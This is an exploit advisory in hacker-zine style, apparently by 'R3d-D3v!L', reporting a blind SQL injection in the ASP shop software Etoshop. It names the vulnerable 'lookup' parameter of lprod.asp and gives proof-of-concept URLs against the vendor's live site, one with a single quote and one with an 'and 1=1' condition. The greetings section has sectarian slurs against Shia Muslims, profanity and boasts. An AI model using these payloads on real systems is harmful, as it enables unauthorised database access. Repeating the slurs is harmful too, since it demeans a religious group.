Etoshop suffers from a remote blind SQL injection vulnerability.
4dc65c4ba24fe3e1570cef126470bd0c891a658fa0912df320f66d1caa3f86b5
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: SuFFEr Fr0M remote BLIND SqL injection
[~] Vendor: http://www.etoshop.com
[+] Software: Etoshop
[+] Platforms: ASP
[~] author: R3d-D3v!L
[+] TEAM: ......
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: i6.jul.2oll
[?] T!ME: 011:33 pm GMT
[?] Home: .........
[^]
[?]
======================================================================================
#suFFEr Fr0M remote SqL iNJECT!ON
======================================================================================
[*] Err0r C0N50L3:
http://www.etoshop.com/etoshop/lprod.asp?lookup=422 <---- vulun
[*] prove of concept =
http://www.etoshop.com/etoshop/lprod.asp?lookup=422' <----false
http://www.etoshop.com/etoshop/lprod.asp?lookup=422%20and%201=1 <---- TRuE
[~]-----------------------------{((TRYAG))}------------------------------------------------
# ;
# ;
[~] Greetz tO: ....................................................................
#
[~]70 ALL ARAB!AN HACKER 3X3PT : .....the fucken for all she3a and 7eaders lions bitches ......#
#
[X] (/) GET your security FUckEN DOWN ((R3d_D3VV!L)) !S HERE (\)
#
[~] spechial thanks :.............................. # ;
#
[?]spechial SupP0RT : MY M!ND #
#
[?]---> ((R3d D3v!L<---R00T-L0RD-->JUPA<---aNd--->Devil ro0t)) #;
#
[~]spechial FR!ND: ........................................#;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------